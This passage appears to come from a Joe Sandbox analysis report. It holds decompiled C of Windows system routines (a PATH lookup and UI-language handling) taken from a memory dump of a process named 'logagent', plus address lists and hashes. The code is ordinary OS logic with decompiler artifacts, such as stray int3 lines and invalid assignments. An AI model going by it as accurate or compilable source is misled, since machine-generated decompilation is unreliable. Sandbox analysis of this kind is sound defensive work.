								_v56 = _t279;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t229 =  *(_v60 + _t291 * 4);
										__eflags = _t229;
										if(_t229 == 0) {
											goto L30;
										} else {
											__eflags = _t229 == 5;
											if(_t229 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t291 * 4);
										 *(_t279 + 0x18) = _t321;
										_t233 =  *(_v60 + _t291 * 4);
										__eflags = _t233 - 8;
										if(_t233 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t233 * 4 +  &M051E2959))) {
												case 0:
													__ax =  *0x52a8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E051FF3E0(__edi,  *0x52a848c, __ax & 0x0000ffff);
														__eax =  *0x52a8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E051FF3E0(_t321, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x52a8480 & 0x0000ffff = E051FF3E0(__edi,  *0x52a8484,  *0x52a8480 & 0x0000ffff);
													__eax =  *0x52a8480 & 0x0000ffff;
													__eax = ( *0x52a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E051FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E051FF3E0(_t321, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t336 = _t336 + 0xc;
													_t321 = _t321 + (_t268 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t321 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x52a575c;
													__eflags = __ebx - 0x52a575c;
													if(__ebx != 0x52a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E051FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x52a575c;
														} while (__ebx != 0x52a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x52a8478 & 0x0000ffff = E051FF3E0(__edi,  *0x52a847c,  *0x52a8478 & 0x0000ffff);
													__eax =  *0x52a8478 & 0x0000ffff;
													__eax = ( *0x52a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E052439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x52a6e58 & 0x0000ffff = E051FF3E0(__edi,  *0x52a6e5c,  *0x52a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x52a6e58 & 0x0000ffff;
													__eax = ( *0x52a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t233 =  *(_v60 + _t319 * 4);
						if(_t233 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t233 * 4 +  &M051E2935))) {
							case 0:
								__ax =  *0x52a8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E051E2E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x52a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x52a8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E051CEEF0(0x52a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E051CEB70(__ecx, 0x52a79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t207 = _v72;
											__eflags = _t207;
											if(_t207 != 0) {
												L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t207);
											}
											_t208 = _v52;
											__eflags = _t208;
											if(_t208 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
													_t208 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x52a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L051D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E051CEB70(__ecx, 0x52a79a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t333;
										_pop(_t280);
										return E051FB640(_t208, _t280, _v8 ^ _t333, _t307, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t277 = E051E2E3E(_t275,  &_v36);
									_t287 = _v36;
									_v76 = _t277;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x52a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x52a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x52a8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x52a6e58 & 0x0000ffff;
								__eax = ( *0x52a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					asm("loopne 0x29");
					_t329 = _t326 + 1;
					 *_t329 =  *_t329 - _t279;
					ds = ds;
					_t283 = ds;
					 *_t329 =  *_t329 - _t283;
					_push(ds);
					_t330 = _t329 - 1;
					 *((intOrPtr*)(_t329 - 1)) =  *((intOrPtr*)(_t329 - 1)) - _t283;
					asm("fcomp dword [ebx+0x22]");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x528ff00);
					E0520D08C(_t283, _t321, _t330);
					_v44 =  *[fs:0x18];
					_t322 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t297 = _t250 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x5191664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E051FE5C0(_a8,  *((intOrPtr*)(_t297 + 0x5191668)), _t284);
									_t336 = _t336 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t331 = E052351BE(_t284,  *((intOrPtr*)(_v48 + 0x519166c)), _a16, _t322, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t322;
									if( *_t293 == _t322) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t310 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t310 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t293) {
											__eflags =  *(_t310 + 0x1c);
											if( *(_t310 + 0x1c) == 0) {
												L106:
												_t331 = E051E2AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t322 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t255 = E051C6600( *(_t310 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E051E2C50(_t293, _a8, _t284, _a16, _a20, _a24, _t322);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E051CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t262 = E051E2AE4( &_v36, _a8, _t284, _a16, _a20, _t331);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E051E2C50(_v36, _a8, _t284, _a16, _a20, _t331, 1);
									}
									_v8 = _t322;
									E051E2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t331;
					}
					L70:
					return E0520D0D1(_t248);
				}
				L108:
			}


















































                                              0x051e2584
                                              0x051e2586
                                              0x051e2590
                                              0x051e2596
                                              0x051e2597
                                              0x051e2598
                                              0x051e2599
                                              0x051e259e
                                              0x051e25a4
                                              0x051e25a9
                                              0x051e25ac
                                              0x051e25ae
                                              0x051e25b1
                                              0x051e25b2
                                              0x051e25b5
                                              0x051e25b8
                                              0x051e25bb
                                              0x051e25bc
                                              0x051e25bf
                                              0x051e25c2
                                              0x051e25c5
                                              0x051e25c6
                                              0x051e25cb
                                              0x051e25ce
                                              0x051e25d8
                                              0x051e25db
                                              0x051e25dd
                                              0x051e25de
                                              0x051e25e1
                                              0x051e25e3
                                              0x051e25e9
                                              0x051e26da
                                              0x051e26da
                                              0x051e26dd
                                              0x051e26e2
                                              0x05225b56
                                              0x00000000
                                              0x051e26e8
                                              0x051e26f9
                                              0x051e26fb
                                              0x051e26fe
                                              0x051e2700
                                              0x05225b60
                                              0x00000000
                                              0x051e2706
                                              0x051e2706
                                              0x051e270a
                                              0x051e270a
                                              0x051e270d
                                              0x051e2713
                                              0x051e2716
                                              0x051e2718
                                              0x051e271c
                                              0x051e271e
                                              0x05225b6c
                                              0x05225b6f
                                              0x05225b7f
                                              0x05225b89
                                              0x05225b8e
                                              0x05225b93
                                              0x05225b96
                                              0x05225b9c
                                              0x05225ba0
                                              0x05225ba3
                                              0x05225bab
                                              0x05225bb0
                                              0x05225bb3
                                              0x05225bb3
                                              0x05225ba3
                                              0x051e2724
                                              0x051e2726
                                              0x051e2729
                                              0x051e272c
                                              0x051e279d
                                              0x051e279d
                                              0x051e27a0
                                              0x051e27a2
                                              0x00000000
                                              0x051e272e
                                              0x051e272e
                                              0x051e2731
                                              0x051e2734
                                              0x051e2734
                                              0x051e2736
                                              0x05225bc1
                                              0x05225bc1
                                              0x05225bc4
                                              0x00000000
                                              0x05225bca
                                              0x05225bca
                                              0x05225bcd
                                              0x00000000
                                              0x05225bd3
                                              0x00000000
                                              0x05225bd3
                                              0x05225bcd
                                              0x051e273c
                                              0x051e273c
                                              0x051e2742
                                              0x051e2747
                                              0x051e274a
                                              0x051e274d
                                              0x051e2750
                                              0x00000000
                                              0x051e2756
                                              0x051e2756
                                              0x00000000
                                              0x051e2902
                                              0x051e2908
                                              0x051e290b
                                              0x00000000
                                              0x051e2911
                                              0x051e291c
                                              0x051e2921
                                              0x00000000
                                              0x051e2921
                                              0x00000000
                                              0x00000000
                                              0x051e2880
                                              0x051e2887
                                              0x051e288c
                                              0x00000000
                                              0x00000000
                                              0x051e2805
                                              0x051e280a
                                              0x051e2814
                                              0x051e2816
                                              0x00000000
                                              0x00000000
                                              0x051e281e
                                              0x051e2821
                                              0x051e2823
                                              0x00000000
                                              0x051e2829
                                              0x051e2829
                                              0x051e2831
                                              0x051e283c
                                              0x051e283e
                                              0x00000000
                                              0x051e283e
                                              0x00000000
                                              0x00000000
                                              0x051e284e
                                              0x051e2850
                                              0x051e2851
                                              0x051e2854
                                              0x051e2857
                                              0x051e285a
                                              0x051e285c
                                              0x051e285d
                                              0x00000000
                                              0x00000000
                                              0x051e275d
                                              0x051e2761
                                              0x00000000
                                              0x051e2767
                                              0x051e276e
                                              0x051e2773
                                              0x051e2773
                                              0x051e2776
                                              0x051e2778
                                              0x051e277e
                                              0x051e277e
                                              0x051e2781
                                              0x051e2781
                                              0x051e2783
                                              0x051e2784
                                              0x00000000
                                              0x00000000
                                              0x05225bd8
                                              0x05225bde
                                              0x05225be4
                                              0x05225be6
                                              0x05225be8
                                              0x05225be9
                                              0x05225bee
                                              0x05225bf8
                                              0x05225bff
                                              0x05225c01
                                              0x05225c04
                                              0x05225c07
                                              0x05225c0b
                                              0x05225c0d
                                              0x05225c0d
                                              0x05225c15
                                              0x05225c18
                                              0x05225c1b
                                              0x05225c1b
                                              0x05225c1e
                                              0x00000000
                                              0x00000000
                                              0x051e28c3
                                              0x051e28c8
                                              0x051e28d2
                                              0x051e28d4
                                              0x051e28d8
                                              0x051e28db
                                              0x05225c26
                                              0x05225c28
                                              0x05225c2d
                                              0x05225c2d
                                              0x00000000
                                              0x00000000
                                              0x05225c34
                                              0x05225c36
                                              0x05225c49
                                              0x05225c4e
                                              0x05225c54
                                              0x05225c5b
                                              0x05225c5d
                                              0x05225c60
                                              0x051e2788
                                              0x051e2788
                                              0x051e278b
                                              0x051e278e
                                              0x051e278e
                                              0x051e278e
                                              0x051e2791
                                              0x00000000
                                              0x00000000
                                              0x051e2756
                                              0x051e2750
                                              0x00000000
                                              0x051e2794
                                              0x051e2794
                                              0x051e2795
                                              0x051e2798
                                              0x051e2798
                                              0x00000000
                                              0x051e2734
                                              0x051e272c
                                              0x051e2700
                                              0x051e25ef
                                              0x051e25ef
                                              0x051e25ef
                                              0x051e25f2
                                              0x051e25f8
                                              0x00000000
                                              0x00000000
                                              0x051e25fe
                                              0x00000000
                                              0x051e28e6
                                              0x051e28ec
                                              0x051e28ef
                                              0x051e28f5
                                              0x051e28f8
                                              0x051e28f8
                                              0x00000000
                                              0x051e28f8
                                              0x00000000
                                              0x00000000
                                              0x051e2866
                                              0x051e2866
                                              0x051e2876
                                              0x051e2879
                                              0x00000000
                                              0x00000000
                                              0x051e27e0
                                              0x051e27e7
                                              0x051e27e9
                                              0x051e27eb
                                              0x05225afd
                                              0x00000000
                                              0x05225afd
                                              0x00000000
                                              0x00000000
                                              0x051e2633
                                              0x051e2638
                                              0x051e263b
                                              0x051e263c
                                              0x051e263e
                                              0x051e2640
                                              0x051e2642
                                              0x051e2647
                                              0x051e2649
                                              0x051e264e
                                              0x051e2650
                                              0x051e2653
                                              0x051e2659
                                              0x051e26a2
                                              0x051e26a7
                                              0x051e26ac
                                              0x051e26b2
                                              0x05225b11
                                              0x05225b15
                                              0x05225b17
                                              0x00000000
                                              0x051e26b8
                                              0x051e26b8
                                              0x051e26ba
                                              0x051e27a6
                                              0x051e27a6
                                              0x051e27a9
                                              0x051e27ab
                                              0x051e27b9
                                              0x051e27b9
                                              0x051e27be
                                              0x051e27c1
                                              0x051e27c3
                                              0x051e27c5
                                              0x051e27c7
                                              0x05225c74
                                              0x05225c79
                                              0x05225c79
                                              0x051e27c7
                                              0x00000000
                                              0x051e26c0
                                              0x051e26c0
                                              0x051e26c3
                                              0x051e26c6
                                              0x051e26c6
                                              0x051e26c9
                                              0x051e26c9
                                              0x00000000
                                              0x051e26c9
                                              0x051e26ba
                                              0x051e265b
                                              0x051e265b
                                              0x051e265e
                                              0x051e2667
                                              0x051e266d
                                              0x051e2677
                                              0x051e267c
                                              0x051e267f
                                              0x051e2681
                                              0x05225b49
                                              0x05225b4e
                                              0x051e27cd
                                              0x051e27d0
                                              0x051e27d1
                                              0x051e27d2
                                              0x051e27d4
                                              0x051e27dd
                                              0x051e2687
                                              0x051e2687
                                              0x051e268a
                                              0x051e268b
                                              0x051e268e
                                              0x051e268f
                                              0x051e2691
                                              0x051e2696
                                              0x051e2698
                                              0x051e269d
                                              0x051e269f
                                              0x00000000
                                              0x051e269f
                                              0x051e2681
                                              0x00000000
                                              0x00000000
                                              0x051e2846
                                              0x00000000
                                              0x00000000
                                              0x051e2605
                                              0x051e260a
                                              0x051e260c
                                              0x051e2611
                                              0x051e2616
                                              0x051e2619
                                              0x051e2619
                                              0x051e261e
                                              0x00000000
                                              0x051e2624
                                              0x051e2627
                                              0x051e2627
                                              0x00000000
                                              0x00000000
                                              0x05225b1f
                                              0x00000000
                                              0x00000000
                                              0x051e2894
                                              0x051e289b
                                              0x051e289d
                                              0x051e28a1
                                              0x05225b2b
                                              0x05225b2e
                                              0x05225b2e
                                              0x051e28a7
                                              0x051e28a9
                                              0x05225b04
                                              0x05225b09
                                              0x05225b09
                                              0x05225b09
                                              0x00000000
                                              0x00000000
                                              0x05225b35
                                              0x05225b3c
                                              0x051e28fb
                                              0x051e28fb
                                              0x051e26cc
                                              0x051e26cc
                                              0x051e26d0
                                              0x00000000
                                              0x051e26d2
                                              0x051e26d2
                                              0x00000000
                                              0x051e26d2
                                              0x00000000
                                              0x00000000
                                              0x051e25fe
                                              0x051e292d
                                              0x051e292d
                                              0x051e2930
                                              0x051e2935
                                              0x051e293d
                                              0x051e2945
                                              0x051e2946
                                              0x051e294d
                                              0x051e294e
                                              0x051e295a
                                              0x051e2963
                                              0x051e2969
                                              0x051e296a
                                              0x051e2971
                                              0x051e2981
                                              0x051e2982
                                              0x051e2983
                                              0x051e2984
                                              0x051e2985
                                              0x051e2986
                                              0x051e2987
                                              0x051e2988
                                              0x051e2989
                                              0x051e298a
                                              0x051e298b
                                              0x051e298c
                                              0x051e298d
                                              0x051e298e
                                              0x051e298f
                                              0x051e2990
                                              0x051e2992
                                              0x051e2997
                                              0x051e29a3
                                              0x051e29a6
                                              0x051e29ab
                                              0x051e29ad
                                              0x051e29b0
                                              0x051e29b2
                                              0x05225c80
                                              0x051e29b8
                                              0x051e29b8
                                              0x051e29bb
                                              0x051e29c0
                                              0x051e29c5
                                              0x051e29c6
                                              0x051e29c6
                                              0x051e29c9
                                              0x051e29cb
                                              0x00000000
                                              0x00000000
                                              0x051e29cd
                                              0x051e29d0
                                              0x051e29d9
                                              0x051e29db
                                              0x051e29dd
                                              0x051e2a7f
                                              0x051e2a84
                                              0x051e2a87
                                              0x051e2a89
                                              0x05225ca1
                                              0x05225ca3
                                              0x00000000
                                              0x051e2a8f
                                              0x051e2a8f
                                              0x00000000
                                              0x051e2a8f
                                              0x00000000
                                              0x051e29e3
                                              0x051e29e3
                                              0x051e29e3
                                              0x00000000
                                              0x051e29e3
                                              0x051e29dd
                                              0x00000000
                                              0x051e29db
                                              0x051e29e6
                                              0x051e29e9
                                              0x051e29eb
                                              0x051e29ed
                                              0x051e29f3
                                              0x051e29f5
                                              0x051e29f8
                                              0x051e29fa
                                              0x051e2a97
                                              0x051e2a9a
                                              0x051e2a9d
                                              0x051e2add
                                              0x00000000
                                              0x051e2a9f
                                              0x051e2aa2
                                              0x051e2aa5
                                              0x051e2aa8
                                              0x051e2aab
                                              0x05225cab
                                              0x05225caf
                                              0x05225cc5
                                              0x05225cda
                                              0x05225cdc
                                              0x05225cdf
                                              0x05225ce5
                                              0x00000000
                                              0x05225ceb
                                              0x05225ced
                                              0x05225cee
                                              0x00000000
                                              0x05225cee
                                              0x05225cb1
                                              0x05225cb4
                                              0x05225cb9
                                              0x05225cbb
                                              0x00000000
                                              0x05225cbd
                                              0x05225cbd
                                              0x00000000
                                              0x05225cbd
                                              0x05225cbb
                                              0x051e2ab1
                                              0x051e2ab1
                                              0x051e2ac4
                                              0x051e2ac6
                                              0x051e2ac6
                                              0x00000000
                                              0x051e2ac6
                                              0x051e2aab
                                              0x00000000
                                              0x051e2a00
                                              0x051e2a09
                                              0x051e2a0e
                                              0x051e2a21
                                              0x051e2a24
                                              0x051e2a35
                                              0x051e2a3a
                                              0x051e2a3d
                                              0x051e2a42
                                              0x051e2a59
                                              0x051e2a59
                                              0x051e2a5c
                                              0x051e2a5f
                                              0x051e2a5f
                                              0x051e29fa
                                              0x051e29f3
                                              0x051e2a64
                                              0x051e2a64
                                              0x051e2a6b
                                              0x051e2a6b
                                              0x051e2a6d
                                              0x051e2a72
                                              0x051e2a72
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923
                                              • Opcode ID: e5eced4b455318019ee7f88097b6e854585393507e4a592d9bbb475cbd4f455c
                                              • Instruction ID: 06da769a0e3151cb7907e1f6028c88364f72a341729974d7eea08df5d39ecc9d
                                              • Opcode Fuzzy Hash: e5eced4b455318019ee7f88097b6e854585393507e4a592d9bbb475cbd4f455c
                                              • Instruction Fuzzy Hash: 89C1D579E10619DFCB29DFA8D891BBDBBB9FF49700F494019E811BB250D7749841CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051EFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E051EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E051CEEF0(0x52a7b60);
					_t134 =  *0x52a7b84; // 0x77e07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x52a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x52a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E051C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E051C76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05258938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E051BB150();
													}
													_t116 = E05256D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E051C75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x52a8638; // 0x345f3e0
																	_t122 = L051C38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E051C76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E051C76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L051EFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
